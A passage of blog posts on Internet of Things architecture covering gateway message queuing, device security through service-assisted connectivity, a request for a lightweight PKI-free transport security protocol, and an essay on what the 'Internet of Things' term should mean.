Without this intermediary infrastructure, the gateway approach would still suffer from the issue that devices must be online and available to receive commands and notifications when the control system sends them. With a per-device queue or per-device subscription on a publish/subscribe infrastructure, the control system can drop a command at any time, and the device can pick it up whenever it's online. If the queue provides time-to-live expiration alongside a dead-lettering mechanism for such expired messages, the control system can also know immediately when a message has not been picked up and processed by the device in the allotted time.

The queue also ensures that the device can never be overtaxed with commands or notifications. The device maintains one connection into the gateway and it fetches commands and notifications on its own schedule. Any backlog forms in the gateway and can be handled there accordingly. The gateway can start rejecting commands on the device's behalf if the backlog grows beyond a threshold or the cited expiration mechanism kicks in and the control system gets notified that the command cannot be processed at the moment.

On the ingress-side (from the gateway perspective) using a queue has the same kind of advantages for the backend systems. If devices are connected at scale and input from the devices comes in bursts or has significant spikes around certain hours of the day as with telematics systems in passenger cars during rush-hour, having the gateway deal with the traffic spikes is a great idea to keep the backend system robust. The ingestion queue also allows telemetry and other data to be held temporarily when the backend systems or their dependencies are taken down for service or suffer from service degradation of any kind. You can find more on the usage of brokered messaging infrastructures for these scenarios in a MSDN Magazine article I wrote a year back.

Conclusion

An "Internet of Things" where devices reside in unprotected physical space and where they can interact with the physical world is a very scary proposition if we solely rely on naïve link and network-level approaches to connectivity and security, which are the two deeply interwoven core aspects of the "I" in "IoT". Special-purpose devices don't benefit from constant human oversight as phones and tablets and PCs do, and we struggle even to keep those secure. We have to do a better job, as an industry, to keep the devices secure that we want to install in the world without constant supervision.

"Trustworthy communication" means that information exchanged between devices and control systems is of verifiable origin, correct, unaltered, timely, and cannot be abused by unauthorized parties in any fashion. Such trust cannot be established at scale without employing systems that are designed for the purpose and keep the "bad guys" out. If we want smarter devices around us that helping to improve our lives and are yet power efficient and affordable, we can't leave them alone in untrustworthy physical space taking care of their own defenses, because they won't be able to.

Does this mean that the refrigerator cannot talk to the laundry washing machine on the local network? Yes, that is precisely what that means. Aside from that idea being somewhat ludicrous, how else does the washing machine defend itself from a malicious refrigerator if not by a gateway that can. Devices that are unrelated and are not part of a deeply integrated system meet where they ought to meet: on the open Internet, not "behind the firewall".

Categories: Architecture | Technology

I have an immediate job opening for an open standard or multivendor transport layer security protocol that

  1. does NOT rely on or tie into PKI and especially
  2. doesn’t require the exchange of X.509 certificates for an initial handshake,
  3. supports session resumption, and
  4. can be used with a minimal algorithm suite that is microcontroller friendly (AES-256, SHA-256, ECDH)

Because

  1. For “service assisted connectivity” where a device relies on a gateway to help with any defensive measures from the network layer on up, the device ought to be paired with exactly one (cluster of) gateway(s). Also, an unobserved device should not pose any threat to a network that it is deployed into (see the fridges abused as spam bots or local spies) and therefore outbound communication should be funneled through the gateway as well. TLS/PKI specifically enables promiscuous clients that happily establish sessions with any “trustworthy” (per CA) server, often under direction of an interactive user. Here, I want to pair a device with a gateway, meaning that the peers are known a priori and thus
  2. the certificate exchange is 3-6kb of extra baggage that’s pure overhead if the parties have an existing and well-known peer relationship.
  3. Session resumption is required because devices will get disconnected while roaming and on radio or will temporarily opt to turn off the radio, which might tear sockets. It’s also required because the initial key exchange is computationally very expensive and imposes significant latency overhead due to the extra roundtrips.
  4. Microcontroller based devices are often very constrained with regards to program storage and can’t lug a whole litany of crypto algorithms around. So the protocol must allow for a compliant implementation to only support a small set of algos that can be implemented on MCUs in firmware or in silicone.

Now, TLS 1.2 with a minimal crypto suite profile might actually be suitable if one could cheat around the whole cert exchange and supply clients with an RFC5077 session resumption ticket out-of-band in such a way that it effectively acts as a long-term connection authN/Z token. Alas, you can't. SSH is also a candidate but it doesn't have session resumption.

Ideas? Suggestions? clemensv@microsoft.com or Twitter @clemensv

Categories: Technology

Terminology that loosely ring-fences a group of related technologies is often very helpful in engineering discussions – until the hype machine gets a hold of them. “Cloud” is a fairly obvious victim of this. Initially conceived to describe large-scale, highly-available, geo-redundant, and professionally-managed Internet-based services that are “up there and far away” without the user knowing of or caring about particular machines or even datacenter locations, it’s now come so far that a hard drive manufacturer sells a network attached drive as a “cloud” that allows storing content “safely at home”. Thank you very much. For “cloud”, the dilution of the usefulness of the term took probably a few years and included milestones like the labeling of datacenter virtualization as “private cloud” and more recently the broad relabeling of practically all managed hosting services or even outsourced data center operations as “cloud”.

The term “Internet of Things” is being diluted into near nonsense even faster. It was initially meant to describe, as a sort of visionary lighthouse, the interconnection of sensors and physical devices of all kinds into a network much like the Internet, in order to allow for gaining new insights about and allow new automated interaction with the physical world – juxtaposed with today’s Internet that is primarily oriented towards human-machine interaction. What we’ve ended up with in today’s discussions is that the term has been made synonymous with what I have started to call “Thing on the Internet”.

A refrigerator with a display and a built-in browser that allows browsing the next super-market’s special offers including the ability to order them may be cool (at least on the inside, even when the gadget novelty has worn off), but it’s conceptually and even technically not different from a tablet or phone – and that would even be true if it had a bar code scanner with which one could obsessively check the milk and margarine in and out (in which case professional help may be in order). The same is true for the city guide or weather information functions in a fancy connected car multimedia system or today’s top news headline being burnt into a slice of bread by the mythical Internet toaster. Those things are things on the Internet. They’re the long oxidized fuel of the 1990s dotcom boom and fall. Technically and conceptually boring. Islands. Solved problems.

The challenge is elsewhere.

“Internet of Things” ought to be about internetworked things, about (responsibly) gathering and distributing information from and about the physical world, about temperature and pollution, about heartbeats and blood pressure, about humidity and mineralization, about voltages and amperes, about liquid and gas pressures and volumes, about seismic activity and tides, about velocity, acceleration, and altitude – it’s about learning about the world’s circumstances, drawing conclusions, and then acting on those conclusions, often again affecting the physical world. That may include the “Smart TV”, but not today’s.

The “Internet of Things” isn’t really about things. It’s about systems. It’s about gathering information in certain contexts or even finding out about new contexts and then improving the system as a result. You could, for instance, run a bus line from suburb into town on a sleepy Sunday morning with a promise of no passenger ever waiting for more than, say, 10 minutes, and make public transport vastly more attractive instead of running on a fixed schedule of every 60-90 minutes on that morning, if the bus system only knew where the prospective passengers were and can dynamically dispatch and route a few buses along a loose route.

“Let’s make an app” is today’s knee-jerk approach to realizing such an idea. I would consider it fair if someone were to call that discriminating and elitist as it excludes people too poor to afford a $200 pocket computer with a service plan, as well as many children, and very many elderly people who went through their lives without always-on Internet and have no interest in dealing with it now.

It’s also unnecessary complication, because the bus stop itself can, with a fairly simple (thermographic) camera setup, tell the system whether anyone’s waiting and also easily tell whether they’re actually staying around or end up wandering away, and the system can feed back the currently projected arrival time to a display at the bus stop – which can be reasonably protected against vandalism attempts by shock and glass break sensors triggering alarms as well as remote-recording any such incidents with the camera. The thermographic camera won’t tell us which bus line the prospective passenger wants to take, but a simple button might. It does help easily telling when a rambunctious 10 year-old pushes all the buttons and runs away.

Projecting the bus’ arrival time and planning the optimal route can be aided by city-supplied traffic information collected by induction loops and camera systems in streets and on traffic lights at crossings that can yield statistical projections for days and the time of day as well as ad-hoc data about current traffic disturbances or diversions as well as street conditions due to rain, ice, or fog – which is also supplied by the buses themselves (‘floating car data’) as they’re moving along in traffic. It’s also informed by the bus driver’s shift information, the legal and work-agreement based needs for rest times during the day, as well as the bus’ fuel or battery level, or other operational health parameters that may require a stop at a depot.

All that data informs the computation of the optimal route, which is provided to the bus stops, to the bus (-driver), and those lucky passengers who can afford a $200 pocket computer with a service plan and have asked to be notified when it’s time to leave the corner coffee shop in order to catch the next bus in comfort. What we have in this scenario is a set of bidirectional communication paths from and to bus, bus driver, bus stop, and passengers, aided by sensor data in streets and lights, all connecting up to interconnected set of control and information systems making decisions based on a combination of current input and past experience. Such systems need to ingest, process, and distribute information from and to tens of thousands of sources at the municipal level, and for them to be economically viable for operators and vendors they need to scale across thousands of municipalities. And the scenario I laid just out here is just one slice out of one particular vertical.

Those systems are hard, complex, and pose challenges in terms of system capacity, scalability, reliability, and – towering above all – security that are at the cutting edge or often still beyond the combined manufacturing (and IT) industry’s current abilities and maturity.

“Internet of Things” is not about having a little Arduino box fetch the TV schedule and sounding an alarm when your favorite show is coming on.

That is cool, but it’s just a thing on the Internet.

Categories: Architecture